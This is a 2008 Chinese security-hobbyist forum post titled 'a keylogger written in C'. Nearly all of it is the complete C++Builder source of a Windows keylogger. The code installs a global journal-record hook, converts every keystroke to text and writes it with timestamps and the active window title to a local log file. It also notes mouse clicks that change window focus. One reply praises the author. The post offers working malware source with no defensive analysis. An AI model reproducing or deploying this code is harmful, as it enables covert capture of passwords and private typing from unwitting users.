标题:
C语言写的一个键盘记录程序
[打印本页]
作者:
噯伱╅詠吥變
时间:
2008-6-17 13:53
标题:
C语言写的一个键盘记录程序
//---------------------------------------------------------------------------
#include <vcl.h>
#include <stdio.h>
#pragma hdrstop
#include "main.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
//---------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam);
//钩子变量
HHOOK g_hLogHook=NULL;
//记录上一次得到焦点的窗口句柄
HWND g_hLastFocus=NULL;
//键盘掩码变量
const int KeyPressMask=0x80000000;
//保存上一次按键值
//char g_PrvChar;
//---------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam)
{
if(iCode<0) return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
if(iCode==HC_ACTION)
{
EVENTMSG* pEvt=(EVENTMSG*)lParam;
int i;
HWND hFocus; //保存当前活动窗口句柄
char szTitle[256]; //当前窗口名称
char szTime[128]; //当前的日期和时间
FILE *stream=fopen("f:\\My\\logfile.txt","a+");
if(pEvt->message==WM_KEYDOWN)
{
int vKey=LOBYTE(pEvt->paramL); //取得虚拟键值
char ch;
char str[10];
hFocus=GetActiveWindow(); //获得活动窗口的句柄
if(g_hLastFocus!=hFocus)
{
GetWindowText(hFocus,szTitle,256); //取得一个窗体的标题
g_hLastFocus=hFocus;
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
int iShift=GetKeyState(0x10);
int iCapital=GetKeyState(0x14);
int iNumLock=GetKeyState(0x90);
bool bShift=(iShift&KeyPressMask)==KeyPressMask;
bool bCapital=(iCapital&1)==1;
bool bNumLock=(iNumLock&1)==1;
if(vKey==9) //TAB
fprintf(stream,"%c",'\t');
if(vKey==13) //回车键
fprintf(stream,"%c",'\n');
if(vKey>=48 && vKey<=57) //数字键0-9
{
if(!bShift)
fprintf(stream,"%c",vKey);
else
{
switch(vKey)
{
case 49:
ch='!';
break;
case 50:
ch='@';
break;
case 51:
ch='#';
break;
case 52:
ch='$';
break;
case 53:
ch='%';
break;
case 54:
ch='^';
break;
case 55:
ch='&';
break;
case 56:
ch='*';
break;
case 57:
ch='(';
break;
case 48:
ch=')';
break;
}
fprintf(stream,"%c",ch);
}
}
if(vKey>=65 && vKey<=90) //A-Z a-z
{
if(!bCapital)
{
if(bShift)
ch=vKey;
else
ch=vKey+32;
}
else if(bShift)
ch=vKey+32;
else
ch=vKey;
fprintf(stream,"%c",ch);
}
if(vKey>=96 && vKey<=105) //小键盘0-9
{
if(bNumLock)
fprintf(stream,"%c",vKey-96+48);
}
if(vKey>=186 && vKey<=222) //其它键
{
switch(vKey)
{
case 186:
if (!bShift)
ch=';';
else
ch=':';
break;
case 187:
if (!bShift)
ch='=';
else
ch='+';
break;
case 188:
if (!bShift)
ch=',';
else
ch='<';
break;
case 189:
if (!bShift)
ch='-';
else
ch='_';
break;
case 190:
if (!bShift)
ch='.';
else
ch='>';
break;
case 191:
if (!bShift)
ch='/';
else
ch='?';
break;
case 192:
if (!bShift)
ch='`';
else
ch='~';
break;
case 219:
if (!bShift)
ch='[';
else
ch='{';
break;
case 220:
if (!bShift)
ch='\\';
else
ch='|';
break;
case 221:
if (!bShift)
ch=']';
else
ch='}';
break;
case 222:
if (!bShift)
ch='\'';
else
ch='\"';
break;
default:
ch='n';
break;
}
if (ch!='n' )
fprintf(stream,"%c",ch);
} //
if(vKey>=112 && vKey<=123) // 功能键 [F1]-[F12]
{
switch(wParam)
{
case 112:
fprintf(stream,"%s","[F1]");
break;
case 113:
fprintf(stream,"%s","[F2]");
break;
case 114:
fprintf(stream,"%s","[F3]");
break;
case 115:
fprintf(stream,"%s","[F4]");
break;
case 116:
fprintf(stream,"%s","[F5]");
break;
case 117:
fprintf(stream,"%s","[F6]");
break;
case 118:
fprintf(stream,"%s","[F7]");
break;
case 119:
fprintf(stream,"%s","[F8]");
break;
case 120:
fprintf(stream,"%s","[F9]");
break;
case 121:
fprintf(stream,"%s","[F10]");
break;
case 122:
fprintf(stream,"%s","[F11]");
break;
case 123:
fprintf(stream,"%s","[F12]");
break;
}
}
if (vKey>=8 && vKey<=46) //方向键
{
switch (vKey)
{
case 8:
strcpy(str,"[BK]");
break;
case 9:
strcpy(str,"[TAB]");
break;
case 13:
strcpy(str,"[EN]");
break;
case 27:
strcpy(str,"[ESC]");
break;
case 32:
strcpy(str,"[SP]");
break;
case 33:
strcpy(str,"[PU]");
break;
case 34:
strcpy(str,"[PD]");
break;
case 35:
strcpy(str,"[END]");
break;
case 36:
strcpy(str,"[HOME]");
break;
case 37:
strcpy(str,"[LF]");
break;
case 38:
strcpy(str,"[UF]");
break;
case 39:
strcpy(str,"[RF]");
break;
case 40:
strcpy(str,"[DF]");
break;
case 45:
strcpy(str,"[INS]");
break;
case 46:
strcpy(str,"[DEL]");
break;
default:
ch='n';
break;
}
if (ch!='n' )
{
//if (g_PrvChar!=vKey)
//{
fprintf(stream,"%s",str);
//g_PrvChar=vKey;
//}
}
}
}
if(pEvt->message==WM_LBUTTONDOWN||pEvt->message==WM_RBUTTONDOWN)
{
hFocus=GetActiveWindow();
if(g_hLastFocus!=hFocus)
{
g_hLastFocus=hFocus;
GetWindowText(hFocus,szTitle,256);
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
}
fclose(stream);
}
return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
}
//---------------------------------------------------------------------------
TForm1 *Form1;
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------------------------
void __fastcall TForm1::ButtonInstallClick(TObject *Sender)
{
if(g_hLogHook==NULL)
g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0);
}
//---------------------------------------------------------------------------
void __fastcall TForm1::ButtonUninstallClick(TObject *Sender)
{
if(g_hLogHook!=NULL)
{
UnhookWindowsHookEx(g_hLogHook);
g_hLogHook=NULL;
}
}
//
复制代码
作者:
hilarylove
时间:
2008-11-27 12:31
又是一个自己写的。。强悍啊。我什么时候也可以这样啊。。哎
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2